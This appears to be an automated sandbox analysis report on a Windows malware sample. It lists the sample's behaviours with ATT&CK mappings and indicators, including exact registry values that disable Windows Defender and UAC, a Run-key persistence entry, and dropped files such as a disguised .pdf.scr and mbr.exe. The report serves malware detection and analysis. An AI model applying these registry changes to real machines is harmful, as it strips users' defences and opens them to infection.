780044208370ddc653095749d6e17ba029364d169891c8fcf2ff10974e0800ab

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 6 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

UAC bypass 3 TTPs 2 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2056	takeown.exe
2736	icacls.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2736	icacls.exe
2056	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe"	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Modifies Security services 2 TTPs 5 IoCs

Modifies the startup behavior of a security service.

Modify Registry

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\diskmgmt.msc	mmc.exe
File opened for modification	C:\Windows\system32\lusrmgr.msc	mmc.exe
File created	C:\Windows\System32\sex.exe	cmd.exe
File opened for modification	C:\Windows\System32\sex.exe	cmd.exe
File created	C:\Windows\System32\SwiftHackProtection.pdf.scr	cmd.exe
File opened for modification	C:\Windows\System32\SwiftHackProtection.pdf.scr	cmd.exe
File opened for modification	C:\Windows\system32\devmgmt.msc	mmc.exe
File opened for modification	C:\Windows\system32\services.msc	mmc.exe
File opened for modification	C:\Windows\system32\WF.msc	mmc.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\INF\c_smrvolume.PNF	mmc.exe
File created	C:\Windows\INF\c_fsundelete.PNF	mmc.exe
File created	C:\Windows\N3OS3X3R\mbr.exe	cmd.exe
File created	C:\Windows\INF\c_proximity.PNF	mmc.exe
File created	C:\Windows\INF\c_receiptprinter.PNF	mmc.exe
File created	C:\Windows\INF\c_fsopenfilebackup.PNF	mmc.exe
File created	C:\Windows\ass2.vbs	cmd.exe
File created	C:\Windows\INF\c_fssystemrecovery.PNF	mmc.exe
File created	C:\Windows\INF\c_processor.PNF	mmc.exe
File created	C:\Windows\INF\c_volume.PNF	mmc.exe
File created	C:\Windows\INF\c_fscopyprotection.PNF	mmc.exe
File created	C:\Windows\INF\c_fshsm.PNF	mmc.exe
File created	C:\Windows\INF\c_extension.PNF	mmc.exe
File created	C:\Windows\INF\c_fsvirtualization.PNF	mmc.exe
File created	C:\Windows\INF\c_primitive.PNF	mmc.exe
File created	C:\Windows\INF\c_fscontentscreener.PNF	mmc.exe
File created	C:\Windows\INF\c_monitor.PNF	mmc.exe
File created	C:\Windows\INF\c_fsantivirus.PNF	mmc.exe
File created	C:\Windows\INF\dc1-controller.PNF	mmc.exe
File created	C:\Windows\INF\c_apo.PNF	mmc.exe
File created	C:\Windows\INF\oposdrv.PNF	mmc.exe
File created	C:\Windows\INF\c_barcodescanner.PNF	mmc.exe
File created	C:\Windows\INF\c_camera.PNF	mmc.exe
File created	C:\Windows\INF\c_fscompression.PNF	mmc.exe
File opened for modification	C:\Windows\N3OS3X3R\mbr.exe	cmd.exe
File created	C:\Windows\INF\PerceptionSimulationSixDof.PNF	mmc.exe
File created	C:\Windows\INF\ts_generic.PNF	mmc.exe
File created	C:\Windows\INF\wsdprint.PNF	mmc.exe
File created	C:\Windows\INF\xusb22.PNF	mmc.exe
File created	C:\Windows\INF\c_sslaccel.PNF	mmc.exe
File created	C:\Windows\INF\c_mcx.PNF	mmc.exe
File created	C:\Windows\INF\c_scmdisk.PNF	mmc.exe
File created	C:\Windows\INF\c_fscontinuousbackup.PNF	mmc.exe
File created	C:\Windows\INF\c_nvmedisk.PNF	mmc.exe
File created	C:\Windows\INF\rawsilo.PNF	mmc.exe
File created	C:\Windows\INF\c_fsinfrastructure.PNF	mmc.exe
File created	C:\Windows\INF\c_fsphysicalquotamgmt.PNF	mmc.exe
File created	C:\Windows\ass4.vbs	cmd.exe
File created	C:\Windows\INF\c_magneticstripereader.PNF	mmc.exe
File created	C:\Windows\ass3.vbs	cmd.exe
File created	C:\Windows\INF\c_scmvolume.PNF	mmc.exe
File created	C:\Windows\INF\rdcameradriver.PNF	mmc.exe
File created	C:\Windows\INF\c_computeaccelerator.PNF	mmc.exe
File created	C:\Windows\INF\c_firmware.PNF	mmc.exe
File created	C:\Windows\INF\c_linedisplay.PNF	mmc.exe
File created	C:\Windows\INF\miradisp.PNF	mmc.exe
File created	C:\Windows\INF\remoteposdrv.PNF	mmc.exe
File created	C:\Windows\INF\c_smrdisk.PNF	mmc.exe
File created	C:\Windows\INF\c_fssystem.PNF	mmc.exe
File created	C:\Windows\INF\c_cashdrawer.PNF	mmc.exe
File created	C:\Windows\INF\c_media.PNF	mmc.exe
File created	C:\Windows\INF\c_swcomponent.PNF	mmc.exe
File created	C:\Windows\INF\c_netdriver.PNF	mmc.exe
File created	C:\Windows\INF\c_fsencryption.PNF	mmc.exe
File created	C:\Windows\INF\c_fsactivitymonitor.PNF	mmc.exe
File created	C:\Windows\INF\c_holographic.PNF	mmc.exe
File created	C:\Windows\INF\c_ucm.PNF	mmc.exe
File created	C:\Windows\INF\digitalmediadevice.PNF	mmc.exe
File created	C:\Windows\INF\c_fsreplication.PNF	mmc.exe
File created	C:\Windows\INF\c_display.PNF	mmc.exe
File created	C:\Windows\INF\c_fsquotamgmt.PNF	mmc.exe
File created	C:\Windows\INF\c_fscfsmetadataserver.PNF	mmc.exe
File created	C:\Windows\INF\c_fssecurityenhancer.PNF	mmc.exe
File created	C:\Windows\ass.vbs	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5824	sc.exe
2820	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Checks SCSI registry key(s) 3 TTPs 42 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	mmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	mmc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	mmc.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
2020	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe

Kills process with taskkill 2 IoCs

pid	Process
2512	taskkill.exe
2476	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-101#immutable1 = "Recovery"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-2#immutable1 = "View information about your computer, and change settings for hardware, performance, and remote connections."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-4#immutable1 = "Device Manager"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-2#immutable1 = "Manage your Windows credentials."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-100#immutable1 = "Mouse"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-1#immutable1 = "System"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15301#immutable1 = "Manage your RemoteApp and Desktop Connections"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3001#immutable1 = "Sync files between your computer and network folders"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-301#immutable1 = "Configure your audio devices or change the sound scheme for your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sud.dll,-10#immutable1 = "Choose which programs you want Windows to use for activities like web browsing, editing photos, sending e-mail, and playing music."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4313#immutable1 = "Configure your Internet display and connection settings."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-6#immutable1 = "Color Management"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-101#immutable1 = "Customize your mouse settings, such as the button configuration, double-click speed, mouse pointers, and motion speed."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-160#immutable1 = "Uninstall or change programs on your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-2#immutable1 = "Change default settings for CDs, DVDs, and devices so that you can automatically play music, view pictures, install software, and play games."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12123#immutable1 = "Set firewall security options to help protect your computer from hackers and malicious software."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-103#immutable1 = "Customize your keyboard settings, such as the cursor blink rate and the character repeat rate."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4312#immutable1 = "Internet Options"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-602#immutable1 = "Change how Windows indexes to search faster"	explorer.exe
